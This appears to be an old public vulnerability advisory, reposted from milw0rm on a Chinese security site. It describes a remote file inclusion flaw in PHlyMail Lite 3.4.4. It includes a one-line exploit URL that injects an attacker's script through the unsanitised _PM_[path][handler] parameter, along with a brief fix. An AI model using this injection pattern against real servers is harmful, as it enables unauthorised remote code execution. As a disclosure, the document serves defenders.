--------------------------------------------------------------------------- PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability [2] --------------------------------------------------------------------------- Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net : Remote : Yes Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : PHlyMail Lite version : v. 3.4.4 (Build 3.04.04) URL : http://phlymail.de/ ------------------------------------------------------------------ Exploit: ~~~~~~~ Variable $_PM_[path][handler] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. # http://www.site.com/[path]/handlers/email/folderprops.php?_PM_[path][handler]=[Evil_Script] --------------------------------------------------------------------------- Solution : ~~~~~~~~~ declare variabel $_PM_[path][handler] --------------------------------------------------------------------------- Shoutz: ~~~~~ # Special greetz to my good friend [Oo] # To all members of h4cky0u.org ;) and RST [ hTTp://RST-CREW.net ] --------------------------------------------------------------------------- */ Contact: ~~~~~~~ Nick: Kw3rLn E-mail: ciriboflacs[at]YaHoo[dot]Com Homepage: hTTp://RST-CREW.NET _/* -------------------------------- [ EOF] ---------------------------------- # milw0rm.com [2006-08-21]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论